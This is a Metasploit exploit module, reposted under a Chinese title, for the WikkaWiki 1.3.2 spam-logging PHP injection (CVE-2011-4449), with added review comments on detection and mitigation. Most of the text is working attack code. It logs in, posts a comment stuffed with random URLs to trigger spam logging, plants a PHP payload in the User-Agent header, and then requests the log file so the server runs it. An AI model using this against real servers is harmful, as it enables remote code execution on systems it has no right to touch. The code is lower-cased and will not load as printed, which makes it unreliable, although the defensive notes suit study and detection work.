
WikkaWiki 1.3.2 Spam Logging PHP注入的方法



##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# NOTE(review): this listing appears to have been lower-cased by the hosting site.
# Names such as metasploit3, msf::exploit::remote, excellentranking, optstring and
# runtimeerror are not valid Ruby constants as printed, so the code as shown will not
# load; compare every line against the upstream module before relying on it.
#
# Metasploit module for the WikkaWiki 1.3.2 spam-log PHP injection (CVE-2011-4449 per
# the references below). Flow, as implemented in #exploit: obtain a session cookie,
# log in with the configured credentials, post a comment that trips spam logging while
# the User-Agent header carries PHP, then request the spam log file.
#
# Defensive notes grounded in this module: the PHP travels in the User-Agent header of
# a POST to wikka.php?wakka=<page>/addcomment, and execution is triggered by a GET to
# spamlog.txt.php under the wiki root. Both show up in ordinary web-server access logs;
# a request for spamlog.txt.php, or a User-Agent value containing "<?php", is a strong
# indicator of this activity. The description states the injection only works when
# spam logging is enabled, so disabling it (or keeping the log file outside the web
# root) removes the execution path.
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
# Module metadata plus the user-facing options: username, password, page (a page that
# accepts comments, chosen manually per the description) and targeturi.
def initialize(info={})
super(update_info(info,
'name' => "wikkawiki 1.3.2 spam logging php injection",
'description' => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'page'.
},
'license' => msf_license,
'author' =>
[
'egix', #initial discovery, poc
'sinn3r' #metasploit
],
'references' =>
[
['cve', '2011-4449'],
['osvdb', '77391'],
['edb', '18177'],
# NOTE(review): the host in this URL contains spaces and looks altered by the
# hosting site; verify the ticket URL against the upstream module.
['url', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'payload' =>
{
'badchars' => "\x00"
},
'defaultoptions' =>
{
'exitfunction' => "none"
},
'arch' => arch_php,
'platform' => ['php'],
'targets' =>
[
['wikkawiki 1.3.2 r1814', {}]
],
'privileged' => false,
'disclosuredate' => "nov 30 2011",
'defaulttarget' => 0))
register_options(
[
optstring.new('username', [true, 'wikkawiki username']),
optstring.new('password', [true, 'wikkawiki password']),
optstring.new('page', [true, 'page to inject']),
optstring.new('targeturi', [true, 'the uri path to wikkawiki', '/wikka/'])
], self.class)
end
# Fingerprint only: fetches the homepage and reports "detected" when the body
# contains "powered by wikkawiki", otherwise "safe". No version check is performed,
# so a match does not by itself prove the target is vulnerable.
def check
res = send_request_raw({
'method' => 'get',
'uri' => "#{target_uri.path}wikka.php?wakka=homepage"
})
if res and res.body =~ /powered by wikkawiki/
return exploit::checkcode::detected
else
return exploit::checkcode::safe
end
end
#
# get the cookie before we do any of that login/exploity stuff
#
# Fetches wikka.php and returns the first "name=value" pair from the Set-Cookie
# header whose attributes include a path. Raises when the response has no
# Set-Cookie header at all. Relies on @base and @peer, which #exploit sets.
def get_cookie
res = send_request_raw({
'method' => 'get',
'uri' => "#{@base}wikka.php"
})
# get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['set-cookie']
# scan(...).flatten[0] keeps only the first matching pair; a header without a
# "; path=" attribute yields nil here rather than raising.
cookie = res.headers['set-cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise runtimeerror, "#{@peer} - no cookie found, will not continue"
end
cookie
end
#
# do login, and then return the cookie that contains our credential
#
# Loads the usersettings page to harvest its hidden form fields, posts them together
# with the configured username/password, and returns the original cookie joined with
# the user_name@... and pass@... cookies from the login response. Raises if the hidden
# fieldset is missing or the response carries no user_name cookie (login failed).
# Style note: $1 and scan-with-captures would read clearer as Regexp.last_match(1)
# and named captures.
def login(cookie)
# send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=usersettings"
res = send_request_raw({
'method' => 'get',
'uri' => uri,
'cookie' => cookie
})
# extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>login\/register\<\/legend\>/m
# only hidden inputs whose value is \w+ are captured; other values are dropped
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise runtimeerror, "#{@peer} - unable to find the hidden fieldset required for login"
end
# add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['username']
login['password'] = datastore['password']
login['do_redirect'] = 'on'
login['submit'] = "login"
login['confpassword'] = ''
login['email'] = ''
# port suffix for the Referer header; omitted on the default HTTP port
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'post',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})
if res and res.headers['set-cookie'] =~ /user_name/
# scan(...)[0] is a one-element array (or "" when absent), interpolated as-is below
user = res.headers['set-cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['set-cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['username']}:#{datastore['password']}"
raise runtimeerror, "#{@peer} - unable to login with \"#{cred}\""
end
return cookie_cred
end
#
# after login, we inject the php payload
#
# Reads the hidden fields of the comment form on datastore['page'], posts a comment
# whose body is ten generated URLs (enough to exceed the default comment-URL limit
# named in the description) with the PHP payload placed in the User-Agent header, and
# then requests spamlog.txt.php. Raises if the comment form's hidden fieldset cannot
# be found. Return value is whatever the final send_request_raw returns; it is ignored
# by #exploit.
def inject_exec(cookie)
# get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'get',
'uri' => "#{@base}wikka.php?wakka=#{datastore['page']}&show_comments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise runtimeerror, "#{@peer} - cannot get necessary fields before posting a comment"
end
# generate enough urls to trigger spam logging
urls = ''
# style: the block parameter i is unused; `10.times do` (or |_i|) would be clearer
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end
# add more fields
fields['body'] = urls
fields['submit'] = 'add'
# inject payload
# b64_payload and post_data are assigned but never referenced in this method
b64_payload = rex::text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['page']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'post',
'uri' => "#{@base}wikka.php?wakka=#{datastore['page']}/addcomment",
'cookie' => cookie,
'headers' => { 'referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
# the User-Agent value is what ends up in the spam log; this header is the
# detection point for defenders (see the class comment)
'agent' => "<?php #{payload.encoded} ?>"
})
# fetching the log file is what causes the server to interpret it as PHP
send_request_raw({
'method' => 'get',
'uri' => "#{@base}spamlog.txt.php"
})
end
# Entry point: sets @peer and @base (used by every helper above), runs the three
# stages in order and then hands off to the payload handler.
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
# << mutates the string returned by target_uri.path in place — presumably a fresh
# object on each call; TODO confirm against the mixin
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - getting cookie")
cookie = get_cookie
print_status("#{@peer} - logging in")
cred = login(cookie)
print_status("#{@peer} - triggering spam logging")
inject_exec(cred)
handler
end
end
=begin
for testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
open wikka.config.php, do:
'spam_logging' => '1'
=end
